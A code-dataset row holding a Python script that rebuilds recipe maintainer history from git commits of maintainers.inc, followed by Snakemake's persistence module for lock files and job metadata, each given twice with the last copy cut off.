from rrs.models import MaintenancePlan, Maintainer, RecipeMaintainerHistory, RecipeMaintainer, RecipeMaintenanceLink
from django.core.exceptions import ObjectDoesNotExist
# FIXME we shouldn't be hardcoded to expect RECIPE_MAINTAINER to be set in this file,
# as it may be in the recipe in future
MAINTAINERS_INCLUDE_PATH = 'conf/distro/include/maintainers.inc'
"""
Try to get recipe maintainer from line, if not found return None
"""
def get_recipe_maintainer(line, logger):
import re
regex = re.compile('^RECIPE_MAINTAINER_pn-(?P<pn>.*)\s=\s"(?P<name>.+) <(?P<email>.*)>"$')
match = regex.search(line)
if match:
return (match.group('pn'), match.group('name'), match.group('email'))
else:
logger.debug("line (%s) don\'t match" % (line))
return None
"""
Get commit information from text.
Returns author_name, author_email, date and title.
"""
def get_commit_info(info, logger):
import re
from datetime import datetime
from email.utils import parsedate_tz, mktime_tz
author_regex = re.compile("^Author: (?P<name>.*) <(?P<email>.*)>$")
date_regex = re.compile("^Date: (?P<date>.*)$")
title_regex = re.compile("^ (?P<title>.*)$")
lines = info.split('\n')
author_name = author_regex.search(lines[1]).group('name')
author_email = author_regex.search(lines[1]).group('email')
date_str = date_regex.search(lines[2]).group('date')
date = datetime.utcfromtimestamp(mktime_tz(parsedate_tz(date_str)))
title = title_regex.search(lines[4]).group('title')
return (author_name, author_email, date, title)
def maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir):
maintainers_full_path = os.path.join(layerdir, MAINTAINERS_INCLUDE_PATH)
if not os.path.exists(maintainers_full_path):
logger.warning('Maintainer style is maintainers.inc for plan %s but no maintainers.inc exists in for %s' % (maintplan, layerbranch))
return
logger.debug('Checking maintainers.inc history for %s' % layerbranch)
commits = utils.runcmd("git log --format='%%H' --reverse --date=rfc origin/master %s"
% os.path.join(layerbranch.vcs_subdir, MAINTAINERS_INCLUDE_PATH),
repodir, logger=logger)
no_maintainer, _ = Maintainer.objects.get_or_create(name='No maintainer')
try:
with transaction.atomic():
for commit in commits.strip().split("\n"):
if RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch, sha1=commit):
continue
logger.debug("Analysing commit %s ..." % (commit))
(author_name, author_email, date, title) = \
get_commit_info(utils.runcmd("git show " + commit, repodir,
logger=logger), logger)
author = Maintainer.create_or_update(author_name, author_email)
rms = RecipeMaintainerHistory(title=title, date=date, author=author,
sha1=commit, layerbranch=layerbranch)
rms.save()
utils.runcmd("git checkout %s -f" % commit,
repodir, logger=logger)
lines = [line.strip() for line in open(maintainers_full_path)]
for line in lines:
res = get_recipe_maintainer(line, logger)
if res:
(pn, name, email) = res
qry = Recipe.objects.filter(pn = pn, layerbranch = layerbranch)
if qry:
m = Maintainer.create_or_update(name, email)
rm = RecipeMaintainer()
rm.recipe = qry[0]
rm.maintainer = m
rm.history = rms
rm.save()
logger.debug("%s: Change maintainer to %s in commit %s." % \
(pn, m.name, commit))
else:
logger.debug("%s: Not found in %s." % \
(pn, layerbranch))
# set missing recipes to no maintainer
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: Not found maintainer in commit %s set to 'No maintainer'." % \
(recipe.pn, rms.sha1))
# set new recipes to no maintainer if don't have one
rms = RecipeMaintainerHistory.get_last(layerbranch)
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: New recipe linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: New recipe not found maintainer set to 'No maintainer'." % \
(recipe.pn))
if options.dry_run:
raise DryRunRollbackException
except DryRunRollbackException:
pass
"""
Recreate Maintainership history from the beginning
"""
def maintainer_history(options, logger):
fetchdir = settings.LAYER_FETCH_DIR
if options.plan:
maintplans = MaintenancePlan.objects.filter(id=int(options.plan))
if not maintplans.exists():
logger.error('No maintenance plan with ID %s found' % options.plan)
sys.exit(1)
else:
maintplans = MaintenancePlan.objects.filter(updates_enabled=True)
if not maintplans.exists():
logger.error('No enabled maintenance plans found')
sys.exit(1)
lockfn = os.path.join(fetchdir, "layerindex.lock")
lockfile = utils.lock_file(lockfn)
if not lockfile:
logger.error("Layer index lock timeout expired")
sys.exit(1)
try:
for maintplan in maintplans:
for item in maintplan.maintenanceplanlayerbranch_set.all():
layerbranch = item.layerbranch
if options.fullreload and not options.dry_run:
RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch).delete()
urldir = str(layerbranch.layer.get_fetch_dir())
repodir = os.path.join(fetchdir, urldir)
layerdir = os.path.join(repodir, layerbranch.vcs_subdir)
if maintplan.maintainer_style == 'I':
# maintainers.inc
maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir)
elif maintplan.maintainer_style == 'L':
# Layer-wide, don't need to do anything
logger.debug('Skipping maintainer processing for %s - plan %s maintainer style is layer-wide' % (layerbranch, maintplan))
else:
raise Exception('Unknown maintainer style %s for maintenance plan %s' % (maintplan.maintainer_style, maintplan))
finally:
utils.unlock_file(lockfile)
if __name__=="__main__":
parser = optparse.OptionParser(usage = """%prog [options]""")
parser.add_option("-p", "--plan",
help="Specify maintenance plan to operate on (default is all plans that have updates enabled)",
action="store", dest="plan", default=None)
parser.add_option("--fullreload",
help="Reload upgrade data from scratch",
action="store_true", dest="fullreload", default=False)
parser.add_option("-d", "--debug",
help = "Enable debug output",
action="store_const", const=logging.DEBUG, dest="loglevel",
default=logging.INFO)
parser.add_option("--dry-run",
help = "Do not write any data back to the database",
action="store_true", dest="dry_run", default=False)
logger = get_logger("MaintainerUpdate", settings)
options, args = parser.parse_args(sys.argv)
logger.setLevel(options.loglevel)
maintainer_history(options, logger)
| #!/usr/bin/env python3
# Standalone script which rebuilds the history of maintainership
#
# Copyright (C) 2015 Intel Corporation
# Author: <NAME> <<EMAIL>>
#
# Licensed under the MIT license, see COPYING.MIT for details
import sys
import os.path
import optparse
import logging
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__))))
from common import common_setup, get_logger, DryRunRollbackException
common_setup()
from layerindex import utils, recipeparse
utils.setup_django()
from django.db import transaction
import settings
from layerindex.models import Recipe, LayerBranch, LayerItem
from rrs.models import MaintenancePlan, Maintainer, RecipeMaintainerHistory, RecipeMaintainer, RecipeMaintenanceLink
from django.core.exceptions import ObjectDoesNotExist
# FIXME we shouldn't be hardcoded to expect RECIPE_MAINTAINER to be set in this file,
# as it may be in the recipe in future
MAINTAINERS_INCLUDE_PATH = 'conf/distro/include/maintainers.inc'
"""
Try to get recipe maintainer from line, if not found return None
"""
def get_recipe_maintainer(line, logger):
import re
regex = re.compile('^RECIPE_MAINTAINER_pn-(?P<pn>.*)\s=\s"(?P<name>.+) <(?P<email>.*)>"$')
match = regex.search(line)
if match:
return (match.group('pn'), match.group('name'), match.group('email'))
else:
logger.debug("line (%s) don\'t match" % (line))
return None
"""
Get commit information from text.
Returns author_name, author_email, date and title.
"""
def get_commit_info(info, logger):
import re
from datetime import datetime
from email.utils import parsedate_tz, mktime_tz
author_regex = re.compile("^Author: (?P<name>.*) <(?P<email>.*)>$")
date_regex = re.compile("^Date: (?P<date>.*)$")
title_regex = re.compile("^ (?P<title>.*)$")
lines = info.split('\n')
author_name = author_regex.search(lines[1]).group('name')
author_email = author_regex.search(lines[1]).group('email')
date_str = date_regex.search(lines[2]).group('date')
date = datetime.utcfromtimestamp(mktime_tz(parsedate_tz(date_str)))
title = title_regex.search(lines[4]).group('title')
return (author_name, author_email, date, title)
def maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir):
maintainers_full_path = os.path.join(layerdir, MAINTAINERS_INCLUDE_PATH)
if not os.path.exists(maintainers_full_path):
logger.warning('Maintainer style is maintainers.inc for plan %s but no maintainers.inc exists in for %s' % (maintplan, layerbranch))
return
logger.debug('Checking maintainers.inc history for %s' % layerbranch)
commits = utils.runcmd("git log --format='%%H' --reverse --date=rfc origin/master %s"
% os.path.join(layerbranch.vcs_subdir, MAINTAINERS_INCLUDE_PATH),
repodir, logger=logger)
no_maintainer, _ = Maintainer.objects.get_or_create(name='No maintainer')
try:
with transaction.atomic():
for commit in commits.strip().split("\n"):
if RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch, sha1=commit):
continue
logger.debug("Analysing commit %s ..." % (commit))
(author_name, author_email, date, title) = \
get_commit_info(utils.runcmd("git show " + commit, repodir,
logger=logger), logger)
author = Maintainer.create_or_update(author_name, author_email)
rms = RecipeMaintainerHistory(title=title, date=date, author=author,
sha1=commit, layerbranch=layerbranch)
rms.save()
utils.runcmd("git checkout %s -f" % commit,
repodir, logger=logger)
lines = [line.strip() for line in open(maintainers_full_path)]
for line in lines:
res = get_recipe_maintainer(line, logger)
if res:
(pn, name, email) = res
qry = Recipe.objects.filter(pn = pn, layerbranch = layerbranch)
if qry:
m = Maintainer.create_or_update(name, email)
rm = RecipeMaintainer()
rm.recipe = qry[0]
rm.maintainer = m
rm.history = rms
rm.save()
logger.debug("%s: Change maintainer to %s in commit %s." % \
(pn, m.name, commit))
else:
logger.debug("%s: Not found in %s." % \
(pn, layerbranch))
# set missing recipes to no maintainer
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: Not found maintainer in commit %s set to 'No maintainer'." % \
(recipe.pn, rms.sha1))
# set new recipes to no maintainer if don't have one
rms = RecipeMaintainerHistory.get_last(layerbranch)
for recipe in layerbranch.recipe_set.all():
if not RecipeMaintainer.objects.filter(recipe = recipe, history = rms):
rm = RecipeMaintainer()
rm.recipe = recipe
link_maintainer = RecipeMaintenanceLink.link_maintainer(recipe.pn, rms)
if link_maintainer:
rm.maintainer = link_maintainer.maintainer
else:
rm.maintainer = no_maintainer
rm.history = rms
rm.save()
if link_maintainer:
logger.debug("%s: New recipe linked to maintainer for %s" % (recipe.pn, link_maintainer.recipe.pn))
else:
logger.debug("%s: New recipe not found maintainer set to 'No maintainer'." % \
(recipe.pn))
if options.dry_run:
raise DryRunRollbackException
except DryRunRollbackException:
pass
"""
Recreate Maintainership history from the beginning
"""
def maintainer_history(options, logger):
fetchdir = settings.LAYER_FETCH_DIR
if options.plan:
maintplans = MaintenancePlan.objects.filter(id=int(options.plan))
if not maintplans.exists():
logger.error('No maintenance plan with ID %s found' % options.plan)
sys.exit(1)
else:
maintplans = MaintenancePlan.objects.filter(updates_enabled=True)
if not maintplans.exists():
logger.error('No enabled maintenance plans found')
sys.exit(1)
lockfn = os.path.join(fetchdir, "layerindex.lock")
lockfile = utils.lock_file(lockfn)
if not lockfile:
logger.error("Layer index lock timeout expired")
sys.exit(1)
try:
for maintplan in maintplans:
for item in maintplan.maintenanceplanlayerbranch_set.all():
layerbranch = item.layerbranch
if options.fullreload and not options.dry_run:
RecipeMaintainerHistory.objects.filter(layerbranch=layerbranch).delete()
urldir = str(layerbranch.layer.get_fetch_dir())
repodir = os.path.join(fetchdir, urldir)
layerdir = os.path.join(repodir, layerbranch.vcs_subdir)
if maintplan.maintainer_style == 'I':
# maintainers.inc
maintainers_inc_history(options, logger, maintplan, layerbranch, repodir, layerdir)
elif maintplan.maintainer_style == 'L':
# Layer-wide, don't need to do anything
logger.debug('Skipping maintainer processing for %s - plan %s maintainer style is layer-wide' % (layerbranch, maintplan))
else:
raise Exception('Unknown maintainer style %s for maintenance plan %s' % (maintplan.maintainer_style, maintplan))
finally:
utils.unlock_file(lockfile)
if __name__=="__main__":
parser = optparse.OptionParser(usage = """%prog [options]""")
parser.add_option("-p", "--plan",
help="Specify maintenance plan to operate on (default is all plans that have updates enabled)",
action="store", dest="plan", default=None)
parser.add_option("--fullreload",
help="Reload upgrade data from scratch",
action="store_true", dest="fullreload", default=False)
parser.add_option("-d", "--debug",
help = "Enable debug output",
action="store_const", const=logging.DEBUG, dest="loglevel",
default=logging.INFO)
parser.add_option("--dry-run",
help = "Do not write any data back to the database",
action="store_true", dest="dry_run", default=False)
logger = get_logger("MaintainerUpdate", settings)
options, args = parser.parse_args(sys.argv)
logger.setLevel(options.loglevel)
maintainer_history(options, logger)
| pt | 0.173314 | 1.919856 | 2 |
snakemake/persistence.py | scholer/snakemake | 0 | 13541 | __author__ = "<NAME>"
__copyright__ = "Copyright 2015-2019, <NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
import os
import shutil
import signal
import marshal
import pickle
import json
import time
from base64 import urlsafe_b64encode, b64encode
from functools import lru_cache, partial
from itertools import filterfalse, count
from pathlib import Path
from snakemake.logging import logger
from snakemake.jobs import jobfiles
from snakemake.utils import listfiles
class Persistence:
def __init__(
self,
nolock=False,
dag=None,
conda_prefix=None,
singularity_prefix=None,
shadow_prefix=None,
warn_only=False,
):
self.path = os.path.abspath(".snakemake")
if not os.path.exists(self.path):
os.mkdir(self.path)
self._lockdir = os.path.join(self.path, "locks")
if not os.path.exists(self._lockdir):
os.mkdir(self._lockdir)
self.dag = dag
self._lockfile = dict()
self._metadata_path = os.path.join(self.path, "metadata")
self._incomplete_path = os.path.join(self.path, "incomplete")
self.conda_env_archive_path = os.path.join(self.path, "conda-archive")
self.benchmark_path = os.path.join(self.path, "benchmarks")
if conda_prefix is None:
self.conda_env_path = os.path.join(self.path, "conda")
else:
self.conda_env_path = os.path.abspath(os.path.expanduser(conda_prefix))
if singularity_prefix is None:
self.container_img_path = os.path.join(self.path, "singularity")
else:
self.container_img_path = os.path.abspath(
os.path.expanduser(singularity_prefix)
)
if shadow_prefix is None:
self.shadow_path = os.path.join(self.path, "shadow")
else:
self.shadow_path = os.path.join(shadow_prefix, "shadow")
# place to store any auxiliary information needed during a run (e.g. source tarballs)
self.aux_path = os.path.join(self.path, "auxiliary")
# migration of .snakemake folder structure
migration_indicator = Path(
os.path.join(self._incomplete_path, "migration_underway")
)
if (
os.path.exists(self._metadata_path)
and not os.path.exists(self._incomplete_path)
) or migration_indicator.exists():
os.makedirs(self._incomplete_path, exist_ok=True)
migration_indicator.touch()
self.migrate_v1_to_v2()
migration_indicator.unlink()
self._incomplete_cache = None
for d in (
self._metadata_path,
self._incomplete_path,
self.shadow_path,
self.conda_env_archive_path,
self.conda_env_path,
self.container_img_path,
self.aux_path,
):
os.makedirs(d, exist_ok=True)
if nolock:
self.lock = self.noop
self.unlock = self.noop
if warn_only:
self.lock = self.lock_warn_only
self.unlock = self.noop
self._read_record = self._read_record_cached
def migrate_v1_to_v2(self):
logger.info("Migrating .snakemake folder to new format...")
i = 0
for path, _, filenames in os.walk(self._metadata_path):
path = Path(path)
for filename in filenames:
with open(path / filename, "r") as f:
try:
record = json.load(f)
except json.JSONDecodeError:
continue # not a properly formatted JSON file
if record.get("incomplete", False):
target_path = Path(self._incomplete_path) / path.relative_to(
self._metadata_path
)
os.makedirs(target_path, exist_ok=True)
shutil.copyfile(
path / filename,
target_path / filename,
)
i += 1
# this can take a while for large folders...
if (i % 10000) == 0 and i > 0:
logger.info("{} files migrated".format(i))
logger.info("Migration complete")
@property
def files(self):
if self._files is None:
self._files = set(self.dag.output_files)
return self._files
@property
def locked(self):
inputfiles = set(self.all_inputfiles())
outputfiles = set(self.all_outputfiles())
if os.path.exists(self._lockdir):
for lockfile in self._locks("input"):
with open(lockfile) as lock:
for f in lock:
f = f.strip()
if f in outputfiles:
return True
for lockfile in self._locks("output"):
with open(lockfile) as lock:
for f in lock:
f = f.strip()
if f in outputfiles or f in inputfiles:
return True
return False
def lock_warn_only(self):
if self.locked:
logger.info(
"Error: Directory cannot be locked. This usually "
"means that another Snakemake instance is running on this directory. "
"Another possibility is that a previous run exited unexpectedly."
)
def lock(self):
if self.locked:
raise IOError("Another snakemake process " "has locked this directory.")
self._lock(self.all_inputfiles(), "input")
self._lock(self.all_outputfiles(), "output")
def unlock(self, *args):
logger.debug("unlocking")
for lockfile in self._lockfile.values():
try:
logger.debug("removing lock")
os.remove(lockfile)
except OSError as e:
if e.errno != 2: # missing file
raise e
logger.debug("removed all locks")
def cleanup_locks(self):
shutil.rmtree(self._lockdir)
def cleanup_metadata(self, path):
self._delete_record(self._metadata_path, path)
def cleanup_shadow(self):
if os.path.exists(self.shadow_path):
shutil.rmtree(self.shadow_path)
os.mkdir(self.shadow_path)
def conda_cleanup_envs(self):
# cleanup envs
in_use = set(env.hash[:8] for env in self.dag.conda_envs.values())
for d in os.listdir(self.conda_env_path):
if len(d) >= 8 and d[:8] not in in_use:
if os.path.isdir(os.path.join(self.conda_env_path, d)):
shutil.rmtree(os.path.join(self.conda_env_path, d))
else:
os.remove(os.path.join(self.conda_env_path, d))
# cleanup env archives
in_use = set(env.content_hash for env in self.dag.conda_envs.values())
for d in os.listdir(self.conda_env_archive_path):
if d not in in_use:
shutil.rmtree(os.path.join(self.conda_env_archive_path, d))
def started(self, job, external_jobid=None):
for f in job.output:
self._record(
self._incomplete_path,
{"external_jobid": external_jobid},
f,
)
def finished(self, job, keep_metadata=True):
if not keep_metadata:
for f in job.expanded_output:
self._delete_record(self._incomplete_path, f)
return
version = str(job.rule.version) if job.rule.version is not None else None
code = self._code(job.rule)
input = self._input(job)
log = self._log(job)
params = self._params(job)
shellcmd = job.shellcmd
conda_env = self._conda_env(job)
fallback_time = time.time()
for f in job.expanded_output:
rec_path = self._record_path(self._incomplete_path, f)
starttime = os.path.getmtime(rec_path) if os.path.exists(rec_path) else None
# Sometimes finished is called twice, if so, lookup the previous starttime
if not os.path.exists(rec_path):
starttime = self._read_record(self._metadata_path, f).get(
"starttime", None
)
endtime = f.mtime.local_or_remote() if f.exists else fallback_time
self._record(
self._metadata_path,
{
"version": version,
"code": code,
"rule": job.rule.name,
"input": input,
"log": log,
"params": params,
"shellcmd": shellcmd,
"incomplete": False,
"starttime": starttime,
"endtime": endtime,
"job_hash": hash(job),
"conda_env": conda_env,
"container_img_url": job.container_img_url,
},
f,
)
self._delete_record(self._incomplete_path, f)
def cleanup(self, job):
for f in job.expanded_output:
self._delete_record(self._incomplete_path, f)
self._delete_record(self._metadata_path, f)
def incomplete(self, job):
if self._incomplete_cache is None:
self._cache_incomplete_folder()
if self._incomplete_cache is False: # cache deactivated
def marked_incomplete(f):
return self._exists_record(self._incomplete_path, f)
else:
def marked_incomplete(f):
rec_path = self._record_path(self._incomplete_path, f)
return rec_path in self._incomplete_cache
return any(map(lambda f: f.exists and marked_incomplete(f), job.output))
def _cache_incomplete_folder(self):
self._incomplete_cache = {
os.path.join(path, f)
for path, dirnames, filenames in os.walk(self._incomplete_path)
for f in filenames
}
def external_jobids(self, job):
return list(
set(
self._read_record(self._incomplete_path, f).get("external_jobid", None)
for f in job.output
)
)
def metadata(self, path):
return self._read_record(self._metadata_path, path)
def version(self, path):
return self.metadata(path).get("version")
def rule(self, path):
return self.metadata(path).get("rule")
def input(self, path):
return self.metadata(path).get("input")
def log(self, path):
return self.metadata(path).get("log")
def shellcmd(self, path):
return self.metadata(path).get("shellcmd")
def params(self, path):
return self.metadata(path).get("params")
def code(self, path):
return self.metadata(path).get("code")
def version_changed(self, job, file=None):
"""Yields output files with changed versions of bool if file given."""
return _bool_or_gen(self._version_changed, job, file=file)
def code_changed(self, job, file=None):
"""Yields output files with changed code of bool if file given."""
return _bool_or_gen(self._code_changed, job, file=file)
def input_changed(self, job, file=None):
"""Yields output files with changed input of bool if file given."""
return _bool_or_gen(self._input_changed, job, file=file)
def params_changed(self, job, file=None):
"""Yields output files with changed params of bool if file given."""
return _bool_or_gen(self._params_changed, job, file=file)
def _version_changed(self, job, file=None):
assert file is not None
return self.version(file) != job.rule.version
def _code_changed(self, job, file=None):
assert file is not None
return self.code(file) != self._code(job.rule)
def _input_changed(self, job, file=None):
assert file is not None
return self.input(file) != self._input(job)
def _params_changed(self, job, file=None):
assert file is not None
return self.params(file) != self._params(job)
def noop(self, *args):
pass
def _b64id(self, s):
return urlsafe_b64encode(str(s).encode()).decode()
@lru_cache()
def _code(self, rule):
code = rule.run_func.__code__
return b64encode(pickle_code(code)).decode()
@lru_cache()
def _conda_env(self, job):
if job.conda_env:
return b64encode(job.conda_env.content).decode()
@lru_cache()
def _input(self, job):
return sorted(job.input)
@lru_cache()
def _log(self, job):
return sorted(job.log)
@lru_cache()
def _params(self, job):
return sorted(map(repr, job.params))
@lru_cache()
def _output(self, job):
return sorted(job.output)
def _record(self, subject, json_value, id):
recpath = self._record_path(subject, id)
os.makedirs(os.path.dirname(recpath), exist_ok=True)
with open(recpath, "w") as f:
json.dump(json_value, f)
def _delete_record(self, subject, id):
try:
recpath = self._record_path(subject, id)
os.remove(recpath)
recdirs = os.path.relpath(os.path.dirname(recpath), start=subject)
if recdirs != ".":
os.removedirs(recdirs)
except OSError as e:
if e.errno != 2: # not missing
raise e
@lru_cache()
def _read_record_cached(self, subject, id):
return self._read_record_uncached(subject, id)
def _read_record_uncached(self, subject, id):
if not self._exists_record(subject, id):
return dict()
with open(self._record_path(subject, id), "r") as f:
return json.load(f)
def _exists_record(self, subject, id):
return os.path.exists(self._record_path(subject, id))
def _locks(self, type):
return (
f
for f, _ in listfiles(
os.path.join(self._lockdir, "{{n,[0-9]+}}.{}.lock".format(type))
)
if not os.path.isdir(f)
)
def _lock(self, files, type):
for i in count(0):
lockfile = os.path.join(self._lockdir, "{}.{}.lock".format(i, type))
if not os.path.exists(lockfile):
self._lockfile[type] = lockfile
with open(lockfile, "w") as lock:
print(*files, sep="\n", file=lock)
return
def _record_path(self, subject, id):
max_len = (
os.pathconf(subject, "PC_NAME_MAX") if os.name == "posix" else 255
) # maximum NTFS and FAT32 filename length
if max_len == 0:
max_len = 255
b64id = self._b64id(id)
# split into chunks of proper length
b64id = [b64id[i : i + max_len - 1] for i in range(0, len(b64id), max_len - 1)]
# prepend dirs with @ (does not occur in b64) to avoid conflict with b64-named files in the same dir
b64id = ["@" + s for s in b64id[:-1]] + [b64id[-1]]
path = os.path.join(subject, *b64id)
return path
def all_outputfiles(self):
# we only look at output files that will be updated
return jobfiles(self.dag.needrun_jobs, "output")
def all_inputfiles(self):
# we consider all input files, also of not running jobs
return jobfiles(self.dag.jobs, "input")
def deactivate_cache(self):
self._read_record_cached.cache_clear()
self._read_record = self._read_record_uncached
self._incomplete_cache = False
def _bool_or_gen(func, job, file=None):
if file is None:
return (f for f in job.expanded_output if func(job, file=f))
else:
return func(job, file=file)
def pickle_code(code):
consts = [
(pickle_code(const) if type(const) == type(code) else const)
for const in code.co_consts
]
return pickle.dumps((code.co_code, code.co_varnames, consts, code.co_names))
| __author__ = "<NAME>"
__copyright__ = "Copyright 2015-2019, <NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
import os
import shutil
import signal
import marshal
import pickle
import json
import time
from base64 import urlsafe_b64encode, b64encode
from functools import lru_cache, partial
from itertools import filterfalse, count
from pathlib import Path
from snakemake.logging import logger
from snakemake.jobs import jobfiles
from snakemake.utils import listfiles
class Persistence:
def __init__(
self,
nolock=False,
dag=None,
conda_prefix=None,
singularity_prefix=None,
shadow_prefix=None,
warn_only=False,
):
self.path = os.path.abspath(".snakemake")
if not os.path.exists(self.path):
os.mkdir(self.path)
self._lockdir = os.path.join(self.path, "locks")
if not os.path.exists(self._lockdir):
os.mkdir(self._lockdir)
self.dag = dag
self._lockfile = dict()
self._metadata_path = os.path.join(self.path, "metadata")
self._incomplete_path = os.path.join(self.path, "incomplete")
self.conda_env_archive_path = os.path.join(self.path, "conda-archive")
self.benchmark_path = os.path.join(self.path, "benchmarks")
if conda_prefix is None:
self.conda_env_path = os.path.join(self.path, "conda")
else:
self.conda_env_path = os.path.abspath(os.path.expanduser(conda_prefix))
if singularity_prefix is None:
self.container_img_path = os.path.join(self.path, "singularity")
else:
self.container_img_path = os.path.abspath(
os.path.expanduser(singularity_prefix)
)
if shadow_prefix is None:
self.shadow_path = os.path.join(self.path, "shadow")
else:
self.shadow_path = os.path.join(shadow_prefix, "shadow")
# place to store any auxiliary information needed during a run (e.g. source tarballs)
self.aux_path = os.path.join(self.path, "auxiliary")
# migration of .snakemake folder structure
migration_indicator = Path(
os.path.join(self._incomplete_path, "migration_underway")
)
if (
os.path.exists(self._metadata_path)
and not os.path.exists(self._incomplete_path)
) or migration_indicator.exists():
os.makedirs(self._incomplete_path, exist_ok=True)
migration_indicator.touch()
self.migrate_v1_to_v2()
migration_indicator.unlink()
self._incomplete_cache = None
for d in (
self._metadata_path,
self._incomplete_path,
self.shadow_path,
self.conda_env_archive_path,
self.conda_env_path,
self.container_img_path,
self.aux_path,
):
os.makedirs(d, exist_ok=True)
if nolock:
self.lock = self.noop
self.unlock = self.noop
if warn_only:
self.lock = self.lock_warn_only
self.unlock = self.noop
self._read_record = self._read_record_cached
def migrate_v1_to_v2(self):
logger.info("Migrating .snakemake folder to new format...")
i = 0
for path, _, filenames in os.walk(self._metadata_path):
path = Path(path)
for filename in filenames:
with open(path / filename, "r") as f:
try:
record = json.load(f)
except json.JSONDecodeError:
continue # not a properly formatted JSON file
if record.get("incomplete", False):
target_path = Path(self._incomplete_path) / path.relative_to(
self._metadata_path
)
os.makedirs(target_path, exist_ok=True)
shutil.copyfile(
path / filename,
target_path / filename,
)
i += 1
# this can take a while for large folders...
if (i % 10000) == 0 and i > 0:
logger.info("{} files migrated".format(i))
logger.info("Migration complete")
@property
def files(self):
if self._files is None:
self._files = set(self.dag.output_files)
return self._files
@property
def locked(self):
inputfiles = set(self.all_inputfiles())
outputfiles = set(self.all_outputfiles())
if os.path.exists(self._lockdir):
for lockfile in self._locks("input"):
with open(lockfile) as lock:
for f in lock:
f = f.strip()
if f in outputfiles:
return True
for lockfile in self._locks("output"):
with open(lockfile) as lock:
for f in lock:
f = f.strip()
if f in outputfiles or f in inputfiles:
return True
return False
def lock_warn_only(self):
if self.locked:
logger.info(
"Error: Directory cannot be locked. This usually "
"means that another Snakemake instance is running on this directory. "
"Another possibility is that a previous run exited unexpectedly."
)
def lock(self):
if self.locked:
raise IOError("Another snakemake process " "has locked this directory.")
self._lock(self.all_inputfiles(), "input")
self._lock(self.all_outputfiles(), "output")
def unlock(self, *args):
logger.debug("unlocking")
for lockfile in self._lockfile.values():
try:
logger.debug("removing lock")
os.remove(lockfile)
except OSError as e:
if e.errno != 2: # missing file
raise e
logger.debug("removed all locks")
def cleanup_locks(self):
shutil.rmtree(self._lockdir)
def cleanup_metadata(self, path):
self._delete_record(self._metadata_path, path)
def cleanup_shadow(self):
if os.path.exists(self.shadow_path):
shutil.rmtree(self.shadow_path)
os.mkdir(self.shadow_path)
def conda_cleanup_envs(self):
# cleanup envs
in_use = set(env.hash[:8] for env in self.dag.conda_envs.values())
for d in os.listdir(self.conda_env_path):
if len(d) >= 8 and d[:8] not in in_use:
if os.path.isdir(os.path.join(self.conda_env_path, d)):
shutil.rmtree(os.path.join(self.conda_env_path, d))
else:
os.remove(os.path.join(self.conda_env_path, d))
# cleanup env archives
in_use = set(env.content_hash for env in self.dag.conda_envs.values())
for d in os.listdir(self.conda_env_archive_path):
if d not in in_use:
shutil.rmtree(os.path.join(self.conda_env_archive_path, d))
def started(self, job, external_jobid=None):
for f in job.output:
self._record(
self._incomplete_path,
{"external_jobid": external_jobid},
f,
)
def finished(self, job, keep_metadata=True):
if not keep_metadata:
for f in job.expanded_output:
self._delete_record(self._incomplete_path, f)
return
version = str(job.rule.version) if job.rule.version is not None else None
code = self._code(job.rule)
input = self._input(job)
log = self._log(job)
params = self._params(job)
shellcmd = job.shellcmd
conda_env = self._conda_env(job)
fallback_time = time.time()
for f in job.expanded_output:
rec_path = self._record_path(self._incomplete_path, f)
starttime = os.path.getmtime(rec_path) if os.path.exists(rec_path) else None
# Sometimes finished is called twice, if so, lookup the previous starttime
if not os.path.exists(rec_path):
starttime = self._read_record(self._metadata_path, f).get(
"starttime", None
)
endtime = f.mtime.local_or_remote() if f.exists else fallback_time
self._record(
self._metadata_path,
{
"version": version,
"code": code,
"rule": job.rule.name,
"input": input,
"log": log,
"params": params,
"shellcmd": shellcmd,
"incomplete": False,
"starttime": starttime,
"endtime": endtime,
"job_hash": hash(job),
"conda_env": conda_env,
"container_img_url": job.container_img_url,
},
f,
)
self._delete_record(self._incomplete_path, f)
def cleanup(self, job):
for f in job.expanded_output:
self._delete_record(self._incomplete_path, f)
self._delete_record(self._metadata_path, f)
def incomplete(self, job):
if self._incomplete_cache is None:
self._cache_incomplete_folder()
if self._incomplete_cache is False: # cache deactivated
def marked_incomplete(f):
return self._exists_record(self._incomplete_path, f)
else:
def marked_incomplete(f):
rec_path = self._record_path(self._incomplete_path, f)
return rec_path in self._incomplete_cache
return any(map(lambda f: f.exists and marked_incomplete(f), job.output))
def _cache_incomplete_folder(self):
self._incomplete_cache = {
os.path.join(path, f)
for path, dirnames, filenames in os.walk(self._incomplete_path)
for f in filenames
}
def external_jobids(self, job):
return list(
set(
